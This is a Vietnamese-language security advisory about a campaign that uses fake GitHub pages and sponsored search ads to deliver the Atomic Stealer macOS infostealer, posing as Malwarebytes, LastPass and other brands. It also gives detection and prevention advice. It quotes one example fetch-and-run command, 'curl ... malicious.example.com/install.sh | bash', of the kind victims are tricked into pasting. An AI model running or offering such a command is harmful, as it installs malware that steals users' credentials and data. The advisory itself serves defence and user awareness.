Một chiến dịch quy mô lớn đang nhắm mục tiêu vào người dùng Mac bằng cách lợi dụng các trang GitHub giả mạo để phân phối mã độc đánh cắp dữ liệu, được ngụy trang thành các ứng dụng hợp pháp phổ biến. Các phần mềm bị mạo danh bao gồm Malwarebytes for Mac, LastPass, Citibank, SentinelOne và nhiều thương hiệu nổi tiếng khác. Mặc dù hành vi mạo danh thương hiệu không phải là mới, chiến dịch này cho thấy các chiến thuật đang phát triển mà tội phạm mạng sử dụng để lôi kéo người dùng tự cài đặt mã độc hại, dẫn đến nguy cơ đánh cắp dữ liệu nghiêm trọng.

Các nhà nghiên cứu mối đe dọa từ LastPass Threat Intelligence và Malwarebytes đã xác định nhiều trang GitHub mạo danh, purporting để lưu trữ các trình cài đặt macOS cho các ứng dụng đáng tin cậy. Trong một số trường hợp, kẻ tấn công đã mua quảng cáo Google được tài trợ để chuyển hướng người dùng đến các trang độc hại này thay vì các trang web chính thức của nhà cung cấp. Điều này tạo ra một rủi ro đáng kể cho người dùng khi họ tìm kiếm các phần mềm phổ biến.

Phương Thức Lây Nhiễm và Khai Thác Trong Tấn Công Mạng

Chiến Thuật Mạo Danh Thương Hiệu Đáng Tin Cậy

Chiến dịch này khai thác sự tin cậy của người dùng vào các nền tảng và thương hiệu uy tín. Bằng cách tạo ra các trang GitHub giả mạo một cách tinh vi, kẻ tấn công đã xây dựng một môi trường trông giống như các kho lưu trữ phần mềm chính thức. Điều này thành công trong việc đánh lừa người dùng rằng họ đang tải xuống các ứng dụng từ một nguồn hợp pháp, không hề hay biết rằng họ đang cài đặt một loại mã độc đánh cắp dữ liệu.

Kỹ Thuật SEO Poisoning và Quảng Cáo Độc Hại

Để tối đa hóa khả năng tiếp cận và lôi kéo nạn nhân, chiến dịch này sử dụng kết hợp hai phương pháp chính:

• Quảng cáo Google được tài trợ: Kẻ tấn công chi tiền để mua quảng cáo trên Google, đảm bảo rằng các liên kết độc hại của chúng xuất hiện ở những vị trí hàng đầu trong kết quả tìm kiếm. Khi người dùng nhấp vào, họ sẽ bị chuyển hướng đến các trang GitHub giả mạo thay vì trang web chính thức của nhà cung cấp, tăng khả năng tiếp xúc với mối đe dọa đánh cắp dữ liệu.
• Kỹ thuật SEO poisoning: Bằng cách tối ưu hóa các trang giả mạo cho các truy vấn tìm kiếm phổ biến như “Malwarebytes GitHub macOS”, kẻ tấn công đẩy các kho lưu trữ độc hại này lên các vị trí cao trong kết quả tìm kiếm tự nhiên. Điều này khiến người dùng dễ dàng tìm thấy và tin tưởng vào các nguồn không đáng tin cậy.

Sau khi bị lôi kéo đến trang web giả mạo, người dùng sẽ thấy một nút “GET [APPLICATION]”. Việc nhấp vào nút này sẽ không tải xuống ứng dụng mong muốn mà thay vào đó là các hướng dẫn để tải xuống và thực thi một tập lệnh cài đặt từ một tên miền mới được đăng ký. Quá trình này thường diễn ra mà không có bất kỳ lời nhắc xác nhận nào từ người dùng hoặc yêu cầu xem xét mã nguồn, qua đó bỏ qua hiệu quả các biện pháp bảo vệ tích hợp của macOS và sự cảnh giác thông thường của người dùng.

Mã Độc Atomic Stealer (AMOS): Chi Tiết Về Kẻ Đánh Cắp Dữ Liệu

Đặc Điểm Kỹ Thuật của Atomic Stealer

Mục tiêu cốt lõi của chiến dịch này là triển khai Atomic Stealer (còn được gọi là AMOS). Đây là một mã độc đánh cắp dữ liệu rất mạnh mẽ, được thiết kế đặc biệt cho môi trường macOS. Chức năng chính của AMOS là thu thập một cách âm thầm các thông tin nhạy cảm từ hệ thống bị nhiễm, đại diện cho một mối đe dọa đáng kể đối với quyền riêng tư và bảo mật người dùng. Mã độc này đặc biệt nguy hiểm do khả năng khai thác một lượng lớn dữ liệu cá nhân.

Các Loại Dữ Liệu Bị Thu Thập

Atomic Stealer có khả năng trích xuất nhiều loại dữ liệu quan trọng, bao gồm:

• Dữ liệu trình duyệt web: Lịch sử duyệt web, cookies, mật khẩu đã lưu và các thông tin tự động điền biểu mẫu.
• Nội dung Clipboard: Bất kỳ dữ liệu nào đã được sao chép vào bộ nhớ đệm của hệ thống.
• Thông tin xác thực được lưu trữ: Tên người dùng và mật khẩu từ các ứng dụng và dịch vụ khác nhau trên hệ thống.

Mặc dù các giải pháp bảo mật như Malwarebytes for Mac và ThreatDown có khả năng phát hiện và chặn các biến thể của AMOS, kỹ thuật lừa đảo xã hội ban đầu vẫn cho thấy hiệu quả đáng báo động đối với những người dùng thiếu thận trọng. Điều này nhấn mạnh tầm quan trọng của việc cảnh giác không chỉ với phần mềm mà còn với các nguồn tải xuống.

Phương Thức Thực Thi Lệnh Độc Hại và Cơ Chế Né Tránh Bảo Mật

Quá trình cài đặt mã độc dựa hoàn toàn vào một lệnh shell một dòng mà người dùng bị lừa sao chép và dán vào Terminal của macOS. Cách tiếp cận này cực kỳ nguy hiểm vì nó bỏ qua một cách có chủ ý các kiểm tra ký ứng dụng tích hợp sẵn của macOS và không yêu cầu lời nhắc cấp quản trị. Do đó, tập lệnh độc hại được thực thi với các đặc quyền của người dùng hiện tại và có thể cài đặt các tác nhân hoạt động liên tục trong các thư mục LaunchAgents hoặc LaunchDaemons. Điều này cho phép mã độc duy trì sự hiện diện trên hệ thống ngay cả sau khi khởi động lại.

Để gia tăng khả năng che giấu, kẻ tấn công thường mã hóa các URL trung gian bằng Base64. Kỹ thuật này làm cho việc phát hiện đích đến thực sự của các tệp tải xuống trở nên khó khăn hơn đối với người dùng thông thường và ngay cả một số công cụ bảo mật cơ bản. Một ví dụ điển hình về loại lệnh nguy hiểm mà người dùng có thể bị lừa thực thi là:

curl -fsSL malicious.example.com/install.sh | bash

Lệnh này tải xuống và thực thi một tập lệnh trực tiếp từ internet, bỏ qua nhiều lớp bảo mật tiêu chuẩn và cấp cho kẻ tấn công quyền kiểm soát đáng kể trên hệ thống.

Chỉ Số Lây Nhiễm (IOCs) và Phát Hiện Đe Dọa

Mặc dù thông tin ban đầu không cung cấp danh sách IOC cụ thể (như hashes tệp hoặc địa chỉ IP), người dùng và quản trị viên hệ thống cần hết sức cảnh giác với các chỉ số lây nhiễm tiềm năng sau đây để bảo vệ an ninh mạng:

• Tên miền mới được đăng ký: Các tập lệnh cài đặt độc hại thường được lưu trữ trên các tên miền mới, ít được biết đến hoặc có vẻ ngoài đáng ngờ. Luôn kiểm tra kỹ lưỡng nguồn gốc và tính hợp lệ của mọi liên kết tải xuống trước khi tương tác.
• Các mục đáng ngờ trong thư mục LaunchAgents/LaunchDaemons: Mã độc Atomic Stealer có thể thiết lập các tác nhân tồn tại dai dẳng tại ~/Library/LaunchAgents và /Library/LaunchDaemons. Việc tìm thấy các mục không quen thuộc hoặc có tên lạ tại các vị trí này là dấu hiệu cảnh báo cao.

Nếu nghi ngờ một hệ thống đã bị nhiễm mã độc, bước đầu tiên là kiểm tra các thư mục ~/Library/LaunchAgents và /Library/LaunchDaemons để tìm bất kỳ mục nào không quen thuộc hoặc đáng ngờ, sau đó loại bỏ chúng. Để đảm bảo khắc phục triệt để, nên cân nhắc cài đặt lại hoàn toàn macOS và chỉ khôi phục các tệp từ các bản sao lưu đã được xác minh là sạch. Ngoài ra, hãy thay đổi tất cả mật khẩu tài khoản và kích hoạt xác thực đa yếu tố (MFA) để ngăn chặn truy cập trái phép bằng thông tin xác thực có thể đã bị đánh cắp dữ liệu.

Biện Pháp Phòng Ngừa và Tăng Cường An Ninh Mạng Cho Người Dùng macOS

Để tự bảo vệ mình khỏi chiến thuật tấn công mạng này và các mối đe dọa tương tự, người dùng Mac nên nghiêm túc tuân thủ các nguyên tắc bảo mật sau:

• Không bao giờ thực thi lệnh copy-paste không xác minh: Đây là một nguyên tắc bảo mật cơ bản. Tuyệt đối không sao chép và dán các lệnh từ các trang web không xác minh, diễn đàn công cộng hoặc kho lưu trữ GitHub không đáng tin cậy. Các lệnh có cấu trúc như curl ... | bash hoặc các lệnh tải xuống và thực thi trực tiếp khác nên được coi là rủi ro cực kỳ cao và tránh thực thi mà không có sự xem xét kỹ lưỡng của chuyên gia.
• Luôn tải xuống ứng dụng từ nguồn chính thức: Cách an toàn nhất là tải xuống ứng dụng trực tiếp từ trang web chính thức của nhà phát triển hoặc từ một cửa hàng ứng dụng uy tín (ví dụ: Mac App Store). Nếu có bất kỳ nghi ngờ nào về tính xác thực của một liên kết tải xuống, hãy xác minh URL đó trực tiếp với nhà cung cấp thông qua các kênh hỗ trợ chính thức của họ. Malwarebytes Blog cung cấp thêm thông tin chi tiết và cảnh báo về chiến dịch mạo danh này.
• Thận trọng với kết quả tìm kiếm được tài trợ: Luôn kiểm tra kỹ lưỡng địa chỉ URL của các trang web trước khi nhấp vào bất kỳ liên kết nào, đặc biệt là những liên kết xuất hiện dưới dạng quảng cáo được tài trợ trong kết quả tìm kiếm. Kẻ tấn công thường sử dụng chúng để chuyển hướng người dùng đến các trang độc hại giả mạo các thương hiệu đáng tin cậy.
• Triển khai giải pháp bảo vệ chống mã độc thời gian thực: Sử dụng các giải pháp chống mã độc mạnh mẽ có tích hợp tính năng lọc web. Các phần mềm như Malwarebytes for Mac và ThreatDown có khả năng phát hiện và chặn các biến thể của Atomic Stealer ngay từ giai đoạn trước khi cài đặt. Điều này cung cấp một lớp bảo vệ quan trọng chống lại các nỗ lực đánh cắp dữ liệu.

Mặc dù GitHub là một nền tảng được tin cậy rộng rãi cho phần mềm mã nguồn mở, chiến dịch này một lần nữa minh họa cách các đối tượng xấu có thể lợi dụng và vũ khí hóa nó bằng cách mạo danh các thương hiệu hợp pháp. Sự cảnh giác liên tục, thực hành tải xuống cẩn thận và việc triển khai bảo vệ điểm cuối mạnh mẽ vẫn là những biện pháp phòng thủ hiệu quả nhất chống lại các mối đe dọa đánh cắp dữ liệu đang phát triển nhanh chóng như Atomic Stealer.